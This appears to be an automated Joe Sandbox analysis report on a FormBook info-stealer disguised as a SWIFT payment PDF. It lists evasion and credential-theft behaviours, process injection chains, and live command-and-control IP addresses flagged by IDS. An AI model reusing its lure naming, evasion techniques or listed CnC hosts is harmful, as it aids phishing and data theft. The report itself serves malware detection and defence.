Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe

Overview

General Information

Sample name:Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe
Analysis ID:1554464
MD5:fbc1b3a9567b4153601f2f845ecfedf2
SHA1:c64a2e0ad636233b7f55fd0cb95e3a175d6170c0
SHA256:214e00b6e262b442940ca666466022947d103e15837ed50723e6b6ea7d7279dc
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates processes with suspicious names
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64native
  • Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe (PID: 3600 cmdline: "C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe" MD5: FBC1B3A9567B4153601F2F845ECFEDF2)
    • svchost.exe (PID: 7624 cmdline: "C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe" MD5: B7C999040D80E5BF87886D70D992C51E)
      • nmlZZxePqIALDF.exe (PID: 6696 cmdline: "C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • DevicePairingWizard.exe (PID: 1660 cmdline: "C:\Windows\SysWOW64\DevicePairingWizard.exe" MD5: 2A4C038870FD0083037A7B07FEAAEDE5)
          • nmlZZxePqIALDF.exe (PID: 2832 cmdline: "C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 1752 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: FA9F4FC5D7ECAB5A20BF7A9D1251C851)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
0000000D.00000002.5958070475.00000000014A0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000002.00000002.1441626408.0000000000520000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000002.00000002.1442932990.0000000003550000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        0000000C.00000002.5054439385.0000000004310000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          0000000C.00000002.5054354866.00000000042C0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 2 entries
            SourceRuleDescriptionAuthorStrings
            2.2.svchost.exe.520000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              2.2.svchost.exe.520000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                System Summary

                barindex
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe", CommandLine: "C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe", CommandLine|base64offset|contains: 1=N, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe", ParentImage: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe, ParentProcessId: 3600, ParentProcessName: Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe, ProcessCommandLine: "C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe", ProcessId: 7624, ProcessName: svchost.exe
                Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe", CommandLine: "C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe", CommandLine|base64offset|contains: 1=N, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe", ParentImage: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe, ParentProcessId: 3600, ParentProcessName: Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe, ProcessCommandLine: "C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe", ProcessId: 7624, ProcessName: svchost.exe
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-12T15:29:49.793779+010028554651A Network Trojan was detected192.168.11.2049719206.119.81.12180TCP
                2024-11-12T15:30:15.088783+010028554651A Network Trojan was detected192.168.11.204972347.52.221.880TCP
                2024-11-12T15:30:30.042700+010028554651A Network Trojan was detected192.168.11.2049727154.38.64.680TCP
                2024-11-12T15:30:44.048299+010028554651A Network Trojan was detected192.168.11.204973184.32.84.3280TCP
                2024-11-12T15:30:58.706921+010028554651A Network Trojan was detected192.168.11.2049735208.91.197.2780TCP
                2024-11-12T15:31:12.685755+010028554651A Network Trojan was detected192.168.11.2049739203.161.49.19380TCP
                2024-11-12T15:31:26.173800+010028554651A Network Trojan was detected192.168.11.204974313.248.169.4880TCP
                2024-11-12T15:31:39.660092+010028554651A Network Trojan was detected192.168.11.2049747173.255.194.13480TCP
                2024-11-12T15:31:53.081396+010028554651A Network Trojan was detected192.168.11.20497513.33.130.19080TCP
                2024-11-12T15:32:07.100819+010028554651A Network Trojan was detected192.168.11.204975584.32.84.3280TCP
                2024-11-12T15:32:20.485752+010028554651A Network Trojan was detected192.168.11.2049759108.179.252.15280TCP
                2024-11-12T15:32:33.977187+010028554651A Network Trojan was detected192.168.11.204976313.248.169.4880TCP
                2024-11-12T15:32:47.491319+010028554651A Network Trojan was detected192.168.11.2049767199.59.243.22780TCP
                2024-11-12T15:33:00.987859+010028554651A Network Trojan was detected192.168.11.20497713.33.130.19080TCP
                2024-11-12T15:33:14.555422+010028554651A Network Trojan was detected192.168.11.2049775199.59.243.22780TCP
                2024-11-12T15:33:28.075926+010028554651A Network Trojan was detected192.168.11.2049779199.59.243.22780TCP
                2024-11-12T15:33:36.804879+010028554651A Network Trojan was detected192.168.11.2049780206.119.81.12180TCP
                2024-11-12T15:33:51.051338+010028554651A Network Trojan was detected192.168.11.204978447.52.221.880TCP
                2024-11-12T15:34:05.288592+010028554651A Network Trojan was detected192.168.11.2049788154.38.64.680TCP
                2024-11-12T15:34:19.147113+010028554651A Network Trojan was detected192.168.11.204979284.32.84.3280TCP
                2024-11-12T15:34:32.754058+010028554651A Network Trojan was detected192.168.11.2049796208.91.197.2780TCP
                2024-11-12T15:34:46.269429+010028554651A Network Trojan was detected192.168.11.2049800203.161.49.19380TCP
                2024-11-12T15:34:59.588414+010028554651A Network Trojan was detected192.168.11.204980413.248.169.4880TCP
                2024-11-12T15:35:12.897242+010028554651A Network Trojan was detected192.168.11.2049808173.255.194.13480TCP
                2024-11-12T15:35:26.164832+010028554651A Network Trojan was detected192.168.11.20498123.33.130.19080TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-12T15:28:33.384396+010028554641A Network Trojan was detected192.168.11.204978984.32.84.3280TCP
                2024-11-12T15:28:33.384396+010028554641A Network Trojan was detected192.168.11.2049732208.91.197.2780TCP
                2024-11-12T15:28:33.384396+010028554641A Network Trojan was detected192.168.11.204972884.32.84.3280TCP
                2024-11-12T15:28:33.384396+010028554641A Network Trojan was detected192.168.11.2049733208.91.197.2780TCP
                2024-11-12T15:28:33.384396+010028554641A Network Trojan was detected192.168.11.204975284.32.84.3280TCP
                2024-11-12T15:28:33.384396+010028554641A Network Trojan was detected192.168.11.204973084.32.84.3280TCP
                2024-11-12T15:28:33.384396+010028554641A Network Trojan was detected192.168.11.2049734208.91.197.2780TCP
                2024-11-12T15:28:33.384396+010028554641A Network Trojan was detected192.168.11.204979184.32.84.3280TCP
                2024-11-12T15:28:33.384396+010028554641A Network Trojan was detected192.168.11.2049793208.91.197.2780TCP
                2024-11-12T15:28:33.384396+010028554641A Network Trojan was detected192.168.11.204975484.32.84.3280TCP
                2024-11-12T15:28:33.384396+010028554641A Network Trojan was detected192.168.11.204975384.32.84.3280TCP
                2024-11-12T15:28:33.384396+010028554641A Network Trojan was detected192.168.11.204976213.248.169.4880TCP
                2024-11-12T15:28:33.384396+010028554641A Network Trojan was detected192.168.11.204979084.32.84.3280TCP
                2024-11-12T15:28:33.384396+010028554641A Network Trojan was detected192.168.11.204972984.32.84.3280TCP
                2024-11-12T15:28:33.384396+010028554641A Network Trojan was detected192.168.11.204980313.248.169.4880TCP
                2024-11-12T15:28:33.384396+010028554641A Network Trojan was detected192.168.11.20497703.33.130.19080TCP
                2024-11-12T15:28:33.384396+010028554641A Network Trojan was detected192.168.11.204974213.248.169.4880TCP
                2024-11-12T15:28:33.384396+010028554641A Network Trojan was detected192.168.11.2049795208.91.197.2780TCP
                2024-11-12T15:28:33.384396+010028554641A Network Trojan was detected192.168.11.2049794208.91.197.2780TCP
                2024-11-12T15:30:06.488831+010028554641A Network Trojan was detected192.168.11.204972047.52.221.880TCP
                2024-11-12T15:30:09.348521+010028554641A Network Trojan was detected192.168.11.204972147.52.221.880TCP
                2024-11-12T15:30:12.210301+010028554641A Network Trojan was detected192.168.11.204972247.52.221.880TCP
                2024-11-12T15:30:21.474308+010028554641A Network Trojan was detected192.168.11.2049724154.38.64.680TCP
                2024-11-12T15:30:24.331656+010028554641A Network Trojan was detected192.168.11.2049725154.38.64.680TCP
                2024-11-12T15:30:27.179439+010028554641A Network Trojan was detected192.168.11.2049726154.38.64.680TCP
                2024-11-12T15:31:04.558226+010028554641A Network Trojan was detected192.168.11.2049736203.161.49.19380TCP
                2024-11-12T15:31:07.284661+010028554641A Network Trojan was detected192.168.11.2049737203.161.49.19380TCP
                2024-11-12T15:31:10.014314+010028554641A Network Trojan was detected192.168.11.2049738203.161.49.19380TCP
                2024-11-12T15:31:18.152174+010028554641A Network Trojan was detected192.168.11.204974013.248.169.4880TCP
                2024-11-12T15:31:20.831629+010028554641A Network Trojan was detected192.168.11.204974113.248.169.4880TCP
                2024-11-12T15:31:31.658239+010028554641A Network Trojan was detected192.168.11.2049744173.255.194.13480TCP
                2024-11-12T15:31:34.323146+010028554641A Network Trojan was detected192.168.11.2049745173.255.194.13480TCP
                2024-11-12T15:31:36.991794+010028554641A Network Trojan was detected192.168.11.2049746173.255.194.13480TCP
                2024-11-12T15:31:45.115548+010028554641A Network Trojan was detected192.168.11.20497483.33.130.19080TCP
                2024-11-12T15:31:47.770947+010028554641A Network Trojan was detected192.168.11.20497493.33.130.19080TCP
                2024-11-12T15:31:50.428894+010028554641A Network Trojan was detected192.168.11.20497503.33.130.19080TCP
                2024-11-12T15:32:12.534225+010028554641A Network Trojan was detected192.168.11.2049756108.179.252.15280TCP
                2024-11-12T15:32:15.183506+010028554641A Network Trojan was detected192.168.11.2049757108.179.252.15280TCP
                2024-11-12T15:32:17.840745+010028554641A Network Trojan was detected192.168.11.2049758108.179.252.15280TCP
                2024-11-12T15:32:25.974015+010028554641A Network Trojan was detected192.168.11.204976013.248.169.4880TCP
                2024-11-12T15:32:28.652937+010028554641A Network Trojan was detected192.168.11.204976113.248.169.4880TCP
                2024-11-12T15:32:39.496464+010028554641A Network Trojan was detected192.168.11.2049764199.59.243.22780TCP
                2024-11-12T15:32:42.174011+010028554641A Network Trojan was detected192.168.11.2049765199.59.243.22780TCP
                2024-11-12T15:32:44.825126+010028554641A Network Trojan was detected192.168.11.2049766199.59.243.22780TCP
                2024-11-12T15:32:52.979325+010028554641A Network Trojan was detected192.168.11.20497683.33.130.19080TCP
                2024-11-12T15:32:55.650387+010028554641A Network Trojan was detected192.168.11.20497693.33.130.19080TCP
                2024-11-12T15:33:06.571036+010028554641A Network Trojan was detected192.168.11.2049772199.59.243.22780TCP
                2024-11-12T15:33:09.227658+010028554641A Network Trojan was detected192.168.11.2049773199.59.243.22780TCP
                2024-11-12T15:33:11.888868+010028554641A Network Trojan was detected192.168.11.2049774199.59.243.22780TCP
                2024-11-12T15:33:20.096458+010028554641A Network Trojan was detected192.168.11.2049776199.59.243.22780TCP
                2024-11-12T15:33:22.757475+010028554641A Network Trojan was detected192.168.11.2049777199.59.243.22780TCP
                2024-11-12T15:33:25.407887+010028554641A Network Trojan was detected192.168.11.2049778199.59.243.22780TCP
                2024-11-12T15:33:42.465441+010028554641A Network Trojan was detected192.168.11.204978147.52.221.880TCP
                2024-11-12T15:33:45.324228+010028554641A Network Trojan was detected192.168.11.204978247.52.221.880TCP
                2024-11-12T15:33:48.182107+010028554641A Network Trojan was detected192.168.11.204978347.52.221.880TCP
                2024-11-12T15:33:56.720136+010028554641A Network Trojan was detected192.168.11.2049785154.38.64.680TCP
                2024-11-12T15:33:59.564053+010028554641A Network Trojan was detected192.168.11.2049786154.38.64.680TCP
                2024-11-12T15:34:02.441564+010028554641A Network Trojan was detected192.168.11.2049787154.38.64.680TCP
                2024-11-12T15:34:38.124306+010028554641A Network Trojan was detected192.168.11.2049797203.161.49.19380TCP
                2024-11-12T15:34:40.832489+010028554641A Network Trojan was detected192.168.11.2049798203.161.49.19380TCP
                2024-11-12T15:34:43.554422+010028554641A Network Trojan was detected192.168.11.2049799203.161.49.19380TCP
                2024-11-12T15:34:51.562136+010028554641A Network Trojan was detected192.168.11.204980113.248.169.4880TCP
                2024-11-12T15:34:54.231250+010028554641A Network Trojan was detected192.168.11.204980213.248.169.4880TCP
                2024-11-12T15:35:04.884433+010028554641A Network Trojan was detected192.168.11.2049805173.255.194.13480TCP
                2024-11-12T15:35:07.558452+010028554641A Network Trojan was detected192.168.11.2049806173.255.194.13480TCP
                2024-11-12T15:35:10.227186+010028554641A Network Trojan was detected192.168.11.2049807173.255.194.13480TCP
                2024-11-12T15:35:18.183174+010028554641A Network Trojan was detected192.168.11.20498093.33.130.19080TCP
                2024-11-12T15:35:20.843610+010028554641A Network Trojan was detected192.168.11.20498103.33.130.19080TCP
                2024-11-12T15:35:23.491254+010028554641A Network Trojan was detected192.168.11.20498113.33.130.19080TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeAvira: detected
                Source: Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeReversingLabs: Detection: 35%
                Source: Yara matchFile source: 2.2.svchost.exe.520000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.520000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000D.00000002.5958070475.00000000014A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1441626408.0000000000520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1442932990.0000000003550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.5054439385.0000000004310000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.5054354866.00000000042C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1443008474.00000000035A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.5958733126.0000000002A80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeJoe Sandbox ML: detected
                Source: Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: nmlZZxePqIALDF.exe, 0000000B.00000000.1368079590.0000000000B3E000.00000002.00000001.01000000.00000007.sdmp, nmlZZxePqIALDF.exe, 0000000D.00000000.1511410992.0000000000B3E000.00000002.00000001.01000000.00000007.sdmp
                Source: Binary string: wntdll.pdbUGP source: Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000000.00000003.906520048.0000000004560000.00000004.00001000.00020000.00000000.sdmp, Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000000.00000003.905073808.0000000004370000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1442164263.0000000003200000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1354730336.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1352046596.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1442164263.000000000332D000.00000040.00001000.00020000.00000000.sdmp, DevicePairingWizard.exe, 0000000C.00000002.5054689691.000000000464D000.00000040.00001000.00020000.00000000.sdmp, DevicePairingWizard.exe, 0000000C.00000003.1445676504.00000000041CF000.00000004.00000020.00020000.00000000.sdmp, DevicePairingWizard.exe, 0000000C.00000002.5054689691.0000000004520000.00000040.00001000.00020000.00000000.sdmp, DevicePairingWizard.exe, 0000000C.00000003.1448512086.0000000004378000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000000.00000003.906520048.0000000004560000.00000004.00001000.00020000.00000000.sdmp, Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000000.00000003.905073808.0000000004370000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.1442164263.0000000003200000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1354730336.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1352046596.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1442164263.000000000332D000.00000040.00001000.00020000.00000000.sdmp, DevicePairingWizard.exe, DevicePairingWizard.exe, 0000000C.00000002.5054689691.000000000464D000.00000040.00001000.00020000.00000000.sdmp, DevicePairingWizard.exe, 0000000C.00000003.1445676504.00000000041CF000.00000004.00000020.00020000.00000000.sdmp, DevicePairingWizard.exe, 0000000C.00000002.5054689691.0000000004520000.00000040.00001000.00020000.00000000.sdmp, DevicePairingWizard.exe, 0000000C.00000003.1448512086.0000000004378000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: DevicePairingWizard.pdb source: svchost.exe, 00000002.00000003.1410633669.0000000000A1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1410879115.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp, nmlZZxePqIALDF.exe, 0000000B.00000003.4818771537.0000000000EEB000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: DevicePairingWizard.exe, 0000000C.00000002.5055513570.0000000004B4C000.00000004.10000000.00040000.00000000.sdmp, DevicePairingWizard.exe, 0000000C.00000002.5053346838.000000000080C000.00000004.00000020.00020000.00000000.sdmp, nmlZZxePqIALDF.exe, 0000000D.00000002.5959819188.00000000034AC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.1733921214.000000002529C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: DevicePairingWizard.exe, 0000000C.00000002.5055513570.0000000004B4C000.00000004.10000000.00040000.00000000.sdmp, DevicePairingWizard.exe, 0000000C.00000002.5053346838.000000000080C000.00000004.00000020.00020000.00000000.sdmp, nmlZZxePqIALDF.exe, 0000000D.00000002.5959819188.00000000034AC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.1733921214.000000002529C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: DevicePairingWizard.pdbGCTL source: svchost.exe, 00000002.00000003.1410633669.0000000000A1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1410879115.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp, nmlZZxePqIALDF.exe, 0000000B.00000003.4818771537.0000000000EEB000.00000004.00000020.00020000.00000000.sdmp
                Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,0_2_004339B6
                Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00452492
                Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00442886
                Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,0_2_004788BD
                Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,0_2_0045CAFA
                Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00431A86
                Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_0044BD27 FindFirstFileW,CopyFileW,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,0_2_0044BD27
                Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_0045DE8F FindFirstFileW,FindClose,0_2_0045DE8F
                Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_0044BF8B FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0044BF8B
                Source: C:\Windows\SysWOW64\DevicePairingWizard.exeCode function: 4x nop then mov ebx, 00000004h12_2_044104E8

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49771 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49724 -> 154.38.64.6:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49745 -> 173.255.194.134:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49721 -> 47.52.221.8:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49738 -> 203.161.49.193:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49735 -> 208.91.197.27:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49720 -> 47.52.221.8:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49722 -> 47.52.221.8:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49719 -> 206.119.81.121:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49755 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49725 -> 154.38.64.6:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49740 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49723 -> 47.52.221.8:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49747 -> 173.255.194.134:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49736 -> 203.161.49.193:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49726 -> 154.38.64.6:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49780 -> 206.119.81.121:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49744 -> 173.255.194.134:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49749 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49759 -> 108.179.252.152:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49786 -> 154.38.64.6:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49767 -> 199.59.243.227:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49737 -> 203.161.49.193:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49776 -> 199.59.243.227:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49750 -> 3.33.130.190:80
